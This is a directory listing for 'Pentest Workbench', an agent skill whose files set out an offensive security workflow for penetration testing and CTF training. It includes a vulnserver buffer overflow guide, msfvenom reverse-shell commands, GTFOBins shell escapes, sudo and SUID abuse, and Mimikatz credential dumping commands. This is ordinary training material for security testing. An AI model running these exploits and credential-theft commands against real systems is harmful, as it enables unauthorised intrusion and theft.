agentCLAWHUBUnverified

Pentest Workbench

Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testi... Skill: Pentest Workbench Owner: mamuaminu Summary: Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testi... Tags: latest:1.0.0 Version history: v1.0.0 | 2026-04-22T12:20:29.875Z | user Initial release: buffer overflow, privesc, recon, tools catalog Archive index: Archive v1.0.0: 8 files, 11392 bytes Files: referenc

OpenClaw

Rank

62

Safety

84

Downloads

2.0k

Updated

Oct 9, 2026

Version

1.0.0

Source

CLAWHUB

About

What it does, and when to use it.

Capability contract not published. No trust telemetry is available yet. 2K downloads reported by the source. Last updated 10/9/2026.

Avoid when

  • Contract metadata is missing or unavailable for deterministic execution.

Risk flags: missing_or_unavailable_contract, trust_data_unavailable, schema_references_missing

Public facts

Every fact links back to the source it came from.

Vendor
Clawhubvendor · observed Oct 9, 2026
Protocol compatibility
OpenClawcompatibility · observed Oct 9, 2026
Adoption signal
2K downloadsadoption · observed Oct 9, 2026
Latest release
1.0.0release · observed Apr 22, 2026
Handshake status
UNKNOWNsecurity

Install and run

Setup complexity: low.

clawhub skill install s17ff7gwc2t3f0facsm56ktnsd85bcmr:pentest-workbench
  1. Setup complexity is LOW. This package is likely designed for quick installation with minimal external side-effects.
  2. Final validation: Expose the agent to a mock request payload inside a sandbox and trace the network egress before allowing access to real customer data.

Contract: missing

curl -s "https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/snapshot"

Documentation

CLAWHUB

20,137 characters of source documentation, loaded on request.

Extracted files

5 files captured from the source.

SKILL.md

---
name: pentest-workbench
description: "Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testing, analyzing vulnerable targets, conducting privilege escalation, building exploits, or running reconnaissance. Covers: TCP buffer overflows (vulnserver), web application testing (VulnerableWordpress/WPScan), honeypot analysis (Cowrie), GTFOBins/LOLBAS privesc, pwn.college fundamentals, and offensive toolchain automation. Triggers on: run a pentest, exploit this, buffer overflow, privesc, OSCP, CTF, bug bounty, vulnerability assessment, rev shell, test this target."
---

# Pentest Workbench

## Quick Start

1. **Define scope** — target, rules of engagement, goals
2. **Recon** — passive OSINT, network enumeration
3. **Identify** — find vulnerabilities, misconfigs, weak points
4. **Exploit** — leverage findings with appropriate technique
5. **Document** — record steps, evidence, impact, remediation

## Core Workflow

### Phase 1: Recon & Enumeration

- **Network OSINT**: Use `nmap`, `masscan`, `rustscan` for port discovery
- **Passive OSINT**: Subdomain enum, WHOIS, Shodan, Censys, Google dorking
- **Web recon**: Dirbuster, ffuf, Burp Suite crawler
- **For vulnerable targets**: Netcat manual command probing first

**Tools from linked repos:**
- `netstalking-osint` — automated OSINT recon workflows
- `Pentest-Tools` (40+ categories) — scanner/framework discovery, network_enum

### Phase 2: Vulnerability Analysis

- **Web**: WPScan for WordPress, sqlmap for SQLi, Burp for auth bypass
- **Network**: nmap NSE scripts, Metasploit, searchsploit
- **Binary**: IDA/Ghidra for RE, checksec for mitigations
- **Config reviews**: weak permissions, default creds, exposed secrets

### Phase 3: Exploitation

**Buffer Overflow (vulnserver pattern):**
1. Send oversized input to identify crash point
2. Control EIP with offset measurement
3. Find stable jump (JMP ESP / call esp)
4. Generate shellcode (msfvenom / custom)
5. Execute with proper alignment

**Web:**
- SQLi → sqlmap or manual union/boolean
- XSS → Beef/XSS Hunter
- RCE → reverse shell via pentest-tools

**Privesc (GTFOBins):**
```
# Check sudo/suid binaries
sudo -l
find / -perm -4000 2>/dev/null

# Shell escape from restricted editor
:!/bin/bash
```

**AD Attacks (Pentest-Tools):**
- Kerberoasting, AS-REP roasting, SMB relay
- BloodHound/Sharphound enum → Golden/DFSRM

### Phase 4: Post-Exploitation

- Cowrie honeypot: analyze attacker sessions for TTPs
- Privilege escalation: kernel exploits, sudo abuse, service misconfigs
- Persistence: scheduled tasks, services, SSH keys
- Lateral movement: PsExec, WMI, SMB, Pass-the-Hash

### Phase 5: Documentation

- Steps reproducible by another tester
- Evidence: screenshots, packet captures, log output
- Impact: CVSS score, business risk
- Remediation: specific, actionable fixes

## Key References

- **Binary exploitation**: See `references/buffer-overflow.md` (vulnser

_meta.json

{
  "ownerId": "kn76xphpfv9rd6m5y7nbv9fttx85a4m6",
  "slug": "pentest-workbench",
  "version": "1.0.0",
  "publishedAt": 1776860429875
}

references/buffer-overflow.md

# Buffer Overflow Exploitation Guide (vulnserver)

## Overview

vulnserver is a Windows TCP server (port 9999) with 14 intentionally vulnerable commands. Each uses `strcpy` into undersized buffers — classic stack overflow training ground.

## Vulnerable Functions

### In vulnserver.c

| Function | Buffer | Command(s) | Offset to EIP |
|----------|--------|------------|---------------|
| Function1 | 140 chars | GTER | ~144 |
| Function2 | 60 chars | KSTET | ~64 |
| Function3 | 2000 chars | TRUN, GMON, LTER | ~2003 |
| Function4 | 1000 chars | HTER (hex-encoded) | ~1004 |

### In essfunc.dll

| Function | Buffer Size | Notes |
|----------|-------------|-------|
| EssentialFunc10 | 140 | strcpy |
| EssentialFunc11 | 60 | strcpy |
| EssentialFunc12 | 2000 | strcpy + printf status |
| EssentialFunc13 | 2000 | strcpy |
| EssentialFunc14 | 1000 | strcpy |

## Exploitation Phases

### 1. Fuzzing / Crash Identification

Use a fuzzer or manual send to find the crash point:
```
python -c "print('TRUN ' + 'A'*3000)" | nc target 9999
```

Watch for Access Violation (SEH overwrite or EIP control).

### 2. Offset Calculation

Generate a unique pattern (msf-pattern_create or mona.py):
```
!mona pattern_create 3000
```
Send pattern, crash, then:
```
!mona pattern_offset EIP_value
```

### 3. Control EIP

Confirm EIP points to `41414141` (AAAA):
```
buffer = "A"*N + "B"*4 + "C"*remaining
```
Where N = offset, B's overwrite EIP.

### 4. Find Jump Point

Locate a `JMP ESP` or `CALL ESP` in memory without ASLR:
```
!mona jmp -r esp
```
Or use `msf-nasm_shell` to find opcode `FFE4` (JMP ESP).

### 5. Generate Shellcode

Bad chars depend on the command. Common problematic chars: `\x00\x0a\x0d\x25\x26\x3b`

Generate with msfvenom:
```
msfvenom -p windows/shell_reverse_tcp LHOST=x LPORT=443 EXITFUNC=thread -f c -b "\x00\x0a\x0d"
```

### 6. Handle Mitigations

**DEP (Data Execution Prevention):**
- Use `msfvenom -p windows/meterpreter/reverse_tcp` with `EXITFUNC=thread`
- Or use ROP chain to mark stack as executable (mona rop)

**ASLR:**
- Find modules without ASLR (DLLs, exe)
- Use `!mona opt` to find non-ASLR sections

**SafeSEH:**
- Use non-SEH protected modules

### 7. Egghunter (Small Buffer)

When buffer is too small for full shellcode:
```
egghunter = "\x66\x8b\x42\x3b\x80\x74\x0e\xff\xe2\xeb\xf9" + shellcode
# tag: w00t
```

### Command-Specific Notes

**TRUN**: Input after `TRUN ` — stops at first `.` in data
```
TRUN . + payload
```

**GMON**: Input after `GMON ` — crashes at `strlen > 3950`
```
GMON / + payload (needs / somewhere)
```

**HTER**: Hex-encoded input. Each 2 bytes of ASCII hex → 1 byte.
```
HTER 41424344... (maps to ABCD)
```

**LTER**: Transforms bytes > 0x7f by subtracting 0x7f. Crashes on `.` delimiter.
```
LTER + payload + .
```

## Mona.py Cheatsheet

```
!mona pattern_create <length>
!mona pattern_offset <value>
!mona findmsp
!mona jmp -r esp
!mona rop -m <module.dll>
!mona emulate
!mona config -set WorkingFolder C:\mona
```

## Checklist Be

references/privesc.md

# Privilege Escalation Reference

## GTFOBins — Unix Binary Abuse

GTFOBins: https://gtfobins.github.io/

### Common GTFOBins Techniques

**vim/vi** — Escape restricted shell:
```
:!/bin/bash
:shell
```

**awk** — Spawn shell:
```
awk 'BEGIN {system("/bin/sh")}'
```

**find** — Exec from file:
```
find . -exec /bin/sh \; -quit
```

**python/perl/ruby/node** — Shell:
```
python -c 'import os; os.system("/bin/sh")'
perl -e 'exec "/bin/sh"'
ruby -e 'exec "/bin/sh"'
node -e 'require("child_process").exec("/bin/sh")'
```

**less/more** — Via paging:
```
less /etc/passwd
!/bin/sh
```

**tar** — Via archive:
```
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
```

**cp** — Overwrite sensitive files:
```
cp /bin/sh /tmp/sh && chmod +s /tmp/sh
```

**perl** — SUID parent:
```
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
```

## Sudo Abuse Checklist

```bash
sudo -l
# Check for NOPASSWD entries
```

**Known exploitable patterns:**
```
(user) NOPASSWD: /usr/bin/find
(user) NOPASSWD: /usr/bin/vim
(user) NOPASSWD: /usr/bin/less
(user) NOPASSWD: /usr/bin/awk
(user) NOPASSWD: /usr/bin/python
(user) NOPASSWD: /bin/zip /bin/tar /bin/cp
```

## SUID Binary Escalation

Find SUID binaries:
```bash
find / -perm -4000 -type f 2>/dev/null
```

**GTFOBins search**: Filter by Function=Privilege escalation, Context=SUID

**Dangerous patterns:**
- `nmap` (interactive mode → shell)
- `vim` (can read/write any file)
- `less`/`more` (escape to shell)
- `awk` (system exec)
- `python`/`perl`/`ruby` (OS-level access)

## Linux Kernel Exploits

Check kernel version:
```bash
uname -a
cat /etc/issue
```

Known exploits (verify before running):
- `CVE-2022-0847` (DirtyPipe) — Linux 5.8+
- `CVE-2021-4034` (PwnKit) — polkit < 0.120
- `CVE-2019-13272` (PTRACE_TRACEME) — <= 5.1.17
- `CVE-2017-16995` (eBPF) — <= 4.14
- `dirtycow` (CVE-2016-5195) — older kernels

Always verify exploit works in non-production test first.

## Windows Privilege Escalation

### Kernel Exploits
- `MS16-032` — Secondary Logon
- `CVE-2021-34527` (PrintNightmare) — RCE + privesc
- `CVE-2022-26919` (SMBGhost) — for older unpatched systems

### Windows Binary Misconfigs
- `icacls` — Check for weak permissions on system files
- `sc` — Modify service binary path to hijack
- `wmic` — Process creation for lateral

### Always-Useful Windows Enums
```
whoami /all
net user admin
net localgroup administrators
wmic product get name,version
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate
```

### LOLBAS (Windows Binaries)
https://lolbas-project.github.io/

Similar concept to GTFOBins but for Windows:
- `certutil.exe` — Download, decode
- `mshta.exe` — Execute HTA/VBS
- `regsvr32.exe` — COM scriptlet execution
- `wmic.exe` — Process execution
- `bitsadmin.exe` — File transfer

## Credential Access

**Mimikatz** (Windows):
```
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets
kerberos::list
```

**LaZagne** (Windows + Linux):
```
python laZagne.py all

references/tools-inventory.md

# Tools Inventory

All tools catalogued from linked repositories. Organized by category.

## Reconnaissance & OSINT

| Tool | Source | Purpose |
|------|---------|---------|
| `nmap` | Default | Port scanning, service enum, NSE scripts |
| `masscan` | Default | Fast TCP port scanner |
| `rustscan` | Default | Modern port scanner (golang) |
| `Shodan` | Web | Internet-facing device search |
| `Censys` | Web | Certificate/OSINT search |
| `theHarvester` | Pentest-Tools | Email/subdomain OSINT |
| `Amass` | Pentest-Tools | Subdomain enumeration |
| `ffuf` | Default | Web directory fuzzing |
| `dirb` | Default | Web directory brute force |
| `netstalking-osint` | GitHub | Network OSINT automation |

## Web Application Testing

| Tool | Source | Purpose |
|------|---------|---------|
| `Burp Suite` | Default | Web proxy, repeater, intruder |
| `OWASP ZAP` | Default | Automated scanner |
| `WPScan` | VulnerableWordpress | WordPress vulnerability scanner |
| `sqlmap` | Default | SQL injection automation |
| `Beef` | Default | XSS framework |
| `XSStrike` | Pentest-Tools | XSS detection |
| `Commix` | Pentest-Tools | Command injection testing |

## Binary Exploitation

| Tool | Source | Purpose |
|------|---------|---------|
| `msfvenom` | Metasploit | Shellcode generation |
| `msf-pattern_create` | Metasploit | Offset pattern creation |
| `mona.py` | Corelan (Immunity) | Exploit dev helper (Win) |
| `IDA Free` | Hex Rays | Disassembler |
| `Ghidra` | NSA | Reverse engineering |
| `pwndbg` | GitHub | GDB plugin for exploit dev |
| `pwntools` | GitHub | CTF/exploit framework (Python) |
| `vulnserver` | GitHub | BO training target |
| `checksec` | GitHub | Binary mitigation checks |

## Buffer Overflow Commands

```bash
# Pattern generation
msf-pattern_create -l 3000

# Shellcode (Windows)
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=443 -f c -b "\x00\x0a\x0d"

# Egghunter
msfvenom -p windows/egghunter -f raw

# ASMX alphanumeric shellcode
msfvenom -p linux/x86/shell_reverse_tcp LHOST=IP LPORT=443 -f alpha2
```

## Active Directory

| Tool | Source | Purpose |
|------|---------|---------|
| `BloodHound` | BloodHound | AD relationship graphing |
| `SharpHound` | BloodHound | Windows collector |
| `CrackMapExec` | Pentest-Tools | AD enum/attack tool |
| `Impacket` | GitHub | Python AD attack toolkit |
| `Mimikatz` | GitHub | Windows credential access |
| `Rubeus` | GitHub | Kerberos attacks |
| `PowerSploit` | GitHub | PowerShell AD attacks |
| `Nishang` | GitHub | PowerShell offensive scripts |

## Post-Exploitation

| Tool | Source | Purpose |
|------|---------|---------|
| `PowerSploit` | GitHub | PowerShell privesc/persistence |
| `Mimikatz` | GitHub | LSASS, ticket extraction |
| `LaZagne` | GitHub | Browser/credential recovery |
| `SharpMapExec` | Pentest-Tools | Pass-the-Hash |
| `Evil-WinRM` | Pentest-Tools | Remote shell via WinRM |
| `PsExec` | Sysinternals | Remote code exec |
| `WMIExec` | Impacket | Remote WMI execution |
| `Cobalt Strik
Github ReposUpdated 13h agoRank 70

AionUi

Free, local, open-source 24/7 Cowork app and OpenClaw for Gemini CLI, Claude Code, Codex, OpenCode, Qwen Code, Goose CLI, Auggie, and more | 🌟 Star if you like it!

MCPOPENCLAW
Github ReposUpdated 6mo agoRank 70

activepieces

AI Agents & MCPs & AI Workflow Automation • (~400 MCP servers for AI agents) • AI Automation / AI Agent with MCPs • AI Workflows & AI Agents • MCPs for AI Agents

OPENCLAW
Github ReposUpdated 6mo agoRank 70

cherry-studio

AI productivity studio with smart chat, autonomous agents, and 300+ assistants.

MCPOPENCLAW
Github ReposUpdated 7mo agoRank 70

CopilotKit

The Frontend for Agents & Generative UI. React + Angular

OPENCLAW

Machine-readable data

The same record, as JSON, for agents and crawlers.

{
  "facts": [
    {
      "factKey": "vendor",
      "category": "vendor",
      "label": "Vendor",
      "value": "Clawhub",
      "href": "https://clawhub.ai/mamuaminu/skills/pentest-workbench",
      "sourceUrl": "https://clawhub.ai/mamuaminu/skills/pentest-workbench",
      "sourceType": "profile",
      "confidence": "medium",
      "observedAt": "2026-10-09T21:21:22.514Z",
      "isPublic": true
    },
    {
      "factKey": "protocols",
      "category": "compatibility",
      "label": "Protocol compatibility",
      "value": "OpenClaw",
      "href": "https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/contract",
      "sourceUrl": "https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/contract",
      "sourceType": "contract",
      "confidence": "medium",
      "observedAt": "2026-10-09T21:21:22.514Z",
      "isPublic": true
    },
    {
      "factKey": "traction",
      "category": "adoption",
      "label": "Adoption signal",
      "value": "2K downloads",
      "href": "https://clawhub.ai/mamuaminu/pentest-workbench",
      "sourceUrl": "https://clawhub.ai/mamuaminu/pentest-workbench",
      "sourceType": "profile",
      "confidence": "medium",
      "observedAt": "2026-10-09T21:21:22.514Z",
      "isPublic": true
    },
    {
      "factKey": "latest_release",
      "category": "release",
      "label": "Latest release",
      "value": "1.0.0",
      "href": "https://clawhub.ai/mamuaminu/pentest-workbench",
      "sourceUrl": "https://clawhub.ai/mamuaminu/pentest-workbench",
      "sourceType": "release",
      "confidence": "medium",
      "observedAt": "2026-04-22T12:20:29.875Z",
      "isPublic": true
    },
    {
      "factKey": "handshake_status",
      "category": "security",
      "label": "Handshake status",
      "value": "UNKNOWN",
      "href": "https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/trust",
      "sourceUrl": "https://www.xpersona.co/api/v1/agents/clawhub-mamuaminu-pentest-workbench/trust",
      "sourceType": "trust",
      "confidence": "medium",
      "observedAt": null,
      "isPublic": true
    }
  ],
  "events": [
    {
      "eventType": "release",
      "title": "Release 1.0.0",
      "description": "Initial release: buffer overflow, privesc, recon, tools catalog",
      "href": "https://clawhub.ai/mamuaminu/pentest-workbench",
      "sourceUrl": "https://clawhub.ai/mamuaminu/pentest-workbench",
      "sourceType": "release",
      "confidence": "medium",
      "observedAt": "2026-04-22T12:20:29.875Z",
      "isPublic": true
    }
  ]
}

Record generated Oct 10, 2026.

Sponsored

Ads related to Pentest Workbench and adjacent AI workflows.